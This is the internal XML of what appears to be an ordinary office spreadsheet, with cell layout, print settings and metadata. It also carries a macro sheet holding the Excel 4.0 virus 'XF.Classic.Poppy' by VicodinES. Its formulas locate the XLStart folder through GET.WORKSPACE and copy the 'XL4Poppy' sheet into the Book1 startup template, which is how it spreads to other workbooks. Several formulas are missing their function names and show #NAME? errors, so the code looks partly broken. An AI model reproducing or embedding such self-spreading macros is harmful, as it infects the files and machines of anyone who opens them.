      <c r="Q394" s="42"/>
      <c r="R394" s="42"/>
    </row>
    <row r="395" spans="11:18" s="43" customFormat="1" ht="13.5">
      <c r="K395" s="42"/>
      <c r="L395" s="42"/>
      <c r="M395" s="42"/>
      <c r="N395" s="42"/>
      <c r="O395" s="42"/>
      <c r="P395" s="42"/>
      <c r="Q395" s="42"/>
      <c r="R395" s="42"/>
    </row>
    <row r="396" spans="11:18" s="43" customFormat="1" ht="13.5">
      <c r="K396" s="42"/>
      <c r="L396" s="42"/>
      <c r="M396" s="42"/>
      <c r="N396" s="42"/>
      <c r="O396" s="42"/>
      <c r="P396" s="42"/>
      <c r="Q396" s="42"/>
      <c r="R396" s="42"/>
    </row>
    <row r="397" spans="11:18" s="43" customFormat="1" ht="13.5">
      <c r="K397" s="42"/>
      <c r="L397" s="42"/>
      <c r="M397" s="42"/>
      <c r="N397" s="42"/>
      <c r="O397" s="42"/>
      <c r="P397" s="42"/>
      <c r="Q397" s="42"/>
      <c r="R397" s="42"/>
    </row>
    <row r="398" spans="11:18" s="43" customFormat="1" ht="13.5">
      <c r="K398" s="42"/>
      <c r="L398" s="42"/>
      <c r="M398" s="42"/>
      <c r="N398" s="42"/>
      <c r="O398" s="42"/>
      <c r="P398" s="42"/>
      <c r="Q398" s="42"/>
      <c r="R398" s="42"/>
    </row>
    <row r="399" spans="11:18" s="43" customFormat="1" ht="13.5">
      <c r="K399" s="42"/>
      <c r="L399" s="42"/>
      <c r="M399" s="42"/>
      <c r="N399" s="42"/>
      <c r="O399" s="42"/>
      <c r="P399" s="42"/>
      <c r="Q399" s="42"/>
      <c r="R399" s="42"/>
    </row>
  </sheetData>
  <sheetProtection/>
  <mergeCells count="4">
    <mergeCell ref="A2:E5"/>
    <mergeCell ref="B9:D9"/>
    <mergeCell ref="B10:C10"/>
    <mergeCell ref="B69:I69"/>
  </mergeCells>
  <printOptions/>
  <pageMargins left="0.7086614173228347" right="0.6692913385826772" top="0.7480314960629921" bottom="0.5511811023622047" header="0.6692913385826772" footer="0.4724409448818898"/>
  <pageSetup horizontalDpi="300" verticalDpi="300" orientation="portrait" paperSize="9" scale="59" r:id="rId2"/>
  <rowBreaks count="4" manualBreakCount="4">
    <brk id="67" max="255" man="1"/>
    <brk id="159" max="10" man="1"/>
    <brk id="187" max="10" man="1"/>
    <brk id="21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1" customWidth="1"/>
    <col min="2" max="2" width="0.9921875" style="21" customWidth="1"/>
    <col min="3" max="3" width="24.99609375" style="21" customWidth="1"/>
    <col min="4" max="16384" width="7.10546875" style="21" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:3" ht="12.75">
      <c r="A1" s="20" t="s">
        <v>3</v>
      </c>
      <c r="C1" s="21" t="b">
        <f>"XL4Poppy"</f>
        <v>0</v>
      </c>
    </row>
    <row r="2" ht="13.5" thickBot="1">
      <c r="A2" s="20" t="s">
        <v>4</v>
      </c>
    </row>
    <row r="3" spans="1:3" ht="13.5" thickBot="1">
      <c r="A3" s="22" t="s">
        <v>5</v>
      </c>
      <c r="C3" s="23" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="4" spans="1:3" ht="12.75">
      <c r="A4" s="22" t="e">
        <v>#N/A</v>
      </c>
      <c r="C4" s="24" t="b">
        <f>C18</f>
        <v>0</v>
      </c>
    </row>
    <row r="5" ht="12.75">
      <c r="C5" s="24" t="e">
        <f>TRUE,</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="6" ht="13.5" thickBot="1">
      <c r="C6" s="24" t="e">
        <f>#N/A</f>
        <v>#N/A</v>
      </c>
    </row>
    <row r="7" spans="1:3" ht="12.75">
      <c r="A7" s="25" t="s">
        <v>7</v>
      </c>
      <c r="C7" s="24" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="8" spans="1:3" ht="12.75">
      <c r="A8" s="26" t="s">
        <v>8</v>
      </c>
      <c r="C8" s="24" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="9" spans="1:3" ht="12.75">
      <c r="A9" s="27" t="s">
        <v>9</v>
      </c>
      <c r="C9" s="24" t="e">
        <f>FALSE</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="10" spans="1:3" ht="12.75">
      <c r="A10" s="26" t="s">
        <v>10</v>
      </c>
      <c r="C10" s="24" t="b">
        <f>A21</f>
        <v>0</v>
      </c>
    </row>
    <row r="11" spans="1:3" ht="13.5" thickBot="1">
      <c r="A11" s="28" t="s">
        <v>11</v>
      </c>
      <c r="C11" s="24" t="b">
        <f>"6:30:00 PM","Hello"</f>
        <v>0</v>
      </c>
    </row>
    <row r="12" ht="12.75">
      <c r="C12" s="24" t="b">
        <f>"6:30:00 AM","Morning"</f>
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="13.5" thickBot="1">
      <c r="C13" s="24" t="b">
        <f>,"Poppy",TRUE</f>
        <v>0</v>
      </c>
    </row>
    <row r="14" spans="1:3" ht="13.5" thickBot="1">
      <c r="A14" s="23" t="s">
        <v>12</v>
      </c>
      <c r="C14" s="29" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="15" ht="12.75">
      <c r="A15" s="24" t="b">
        <f>"XF.Classic.Poppy by VicodinES",2</f>
        <v>0</v>
      </c>
    </row>
    <row r="16" ht="13.5" thickBot="1">
      <c r="A16" s="24" t="b">
        <f>"ⓒ 1998 The Narkotic Network",2</f>
        <v>0</v>
      </c>
    </row>
    <row r="17" spans="1:3" ht="13.5" thickBot="1">
      <c r="A17" s="29" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
      <c r="C17" s="23" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="18" ht="12.75">
      <c r="C18" s="24" t="e">
        <f>$A$3(GET.WORKSPACE(32)&amp;"\xlstart\Book1.")</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="19" ht="12.75">
      <c r="C19" s="24" t="e">
        <f>"Document_array",</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="20" spans="1:3" ht="12.75">
      <c r="A20" s="30" t="s">
        <v>14</v>
      </c>
      <c r="C20" s="24" t="e">
        <f>$A$1INDEX(,2)</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="21" spans="1:3" ht="12.75">
      <c r="A21" s="31" t="e">
        <f>IF(A3="Book1.",0,99)</f>
        <v>#NAME?</v>
      </c>
      <c r="C21" s="24" t="e">
        <f>$A$2INDEX(,1)</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="22" spans="1:3" ht="12.75">
      <c r="A22" s="24" t="e">
        <f>TRUE,</f>
        <v>#NAME?</v>
      </c>
      <c r="C22" s="24" t="e">
        <f>$A$4GET.DOCUMENT(3,"["&amp;A1&amp;"]"&amp;"XL4Poppy")</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="23" spans="1:3" ht="12.75">
      <c r="A23" s="24" t="e">
        <f>#N/A</f>
        <v>#N/A</v>
      </c>
      <c r="C23" s="29" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="24" ht="12.75">
      <c r="A24" s="24" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="25" ht="12.75">
      <c r="A25" s="24" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="26" spans="1:3" ht="13.5" thickBot="1">
      <c r="A26" s="24" t="b">
        <f>1</f>
        <v>0</v>
      </c>
      <c r="C26" s="32" t="s">
        <v>15</v>
      </c>
    </row>
    <row r="27" spans="1:3" ht="12.75">
      <c r="A27" s="24" t="b">
        <f>1</f>
        <v>0</v>
      </c>
      <c r="C27" s="24" t="b">
        <f>C19</f>
        <v>0</v>
      </c>
    </row>
    <row r="28" spans="1:3" ht="12.75">
      <c r="A28" s="24" t="b">
        <f>1</f>
        <v>0</v>
      </c>
      <c r="C28" s="24" t="e">
        <f>TRUE,</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="29" spans="1:3" ht="12.75">
      <c r="A29" s="24" t="b">
        <f>=</f>
        <v>0</v>
      </c>
      <c r="C29" s="24" t="e">
        <f>#N/A</f>
        <v>#N/A</v>
      </c>
    </row>
    <row r="30" spans="1:3" ht="12.75">
      <c r="A30" s="24" t="b">
        <f>C18</f>
        <v>0</v>
      </c>
      <c r="C30" s="24" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="31" spans="1:3" ht="12.75">
      <c r="A31" s="24" t="b">
        <f>"XL4Poppy",A1</f>
        <v>0</v>
      </c>
      <c r="C31" s="24" t="e">
        <f>FALSE</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="32" spans="1:3" ht="12.75">
      <c r="A32" s="24" t="b">
        <f>"Sheet3","Sheet99"</f>
        <v>0</v>
      </c>
      <c r="C32" s="24" t="b">
        <f>=</f>
        <v>0</v>
      </c>
    </row>
    <row r="33" spans="1:3" ht="12.75">
      <c r="A33" s="24" t="b">
        <f>"Sheet1","Sheet3"</f>
        <v>0</v>
      </c>
      <c r="C33" s="24" t="b">
        <f>C19</f>
        <v>0</v>
      </c>
    </row>
    <row r="34" spans="1:3" ht="12.75">
      <c r="A34" s="24" t="b">
        <f>"Sheet99","Sheet1"</f>
        <v>0</v>
      </c>
      <c r="C34" s="24" t="b">
        <f>"XL4Poppy",A1</f>
        <v>0</v>
      </c>
    </row>
    <row r="35" spans="1:3" ht="12.75">
      <c r="A35" s="24" t="b">
        <f>TRUE,,"VicodinES",TRUE</f>
        <v>0</v>
      </c>
      <c r="C35" s="24" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="36" spans="1:3" ht="12.75">
      <c r="A36" s="24" t="b">
        <f>=</f>
        <v>0</v>
      </c>
      <c r="C36" s="29" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="37" ht="12.75">
      <c r="A37" s="24" t="b">
        <f>=</f>
        <v>0</v>
      </c>
    </row>
    <row r="38" ht="12.75">
      <c r="A38" s="24" t="b">
        <f>=</f>
        <v>0</v>
      </c>
    </row>
    <row r="39" spans="1:3" ht="12.75">
      <c r="A39" s="24" t="b">
        <f>A3</f>
        <v>0</v>
      </c>
      <c r="C39" s="31" t="e">
        <f>"XF.Classic.Poppy"</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="40" spans="1:3" ht="12.75">
      <c r="A40" s="24" t="b">
        <f>=</f>
        <v>0</v>
      </c>
      <c r="C40" s="24" t="b">
        <f>TRUE,"VicodinES and Lord Natas greet you a good morning!"</f>
        <v>0</v>
      </c>
    </row>
    <row r="41" spans="1:3" ht="12.75">
      <c r="A41" s="29" t="e">
        <f>=</f>
        <v>#NAME?</v>
      </c>
      <c r="C41" s="29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경리2</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>MB-EDJUNG</cp:lastModifiedBy>
  <cp:lastPrinted>2011-11-16T02:46:44Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-07-27T08:07:35Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-08-06T06:27:33Z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6&quot;/&gt;&lt;CXlWorkbook id=&quot;1&quot;&gt;&lt;m_cxllink/&gt;&lt;/CXlWorkbook&gt;&lt;/root&gt;">
    <vt:bool>false</vt:bool>
  </property>
</Properties>
</file>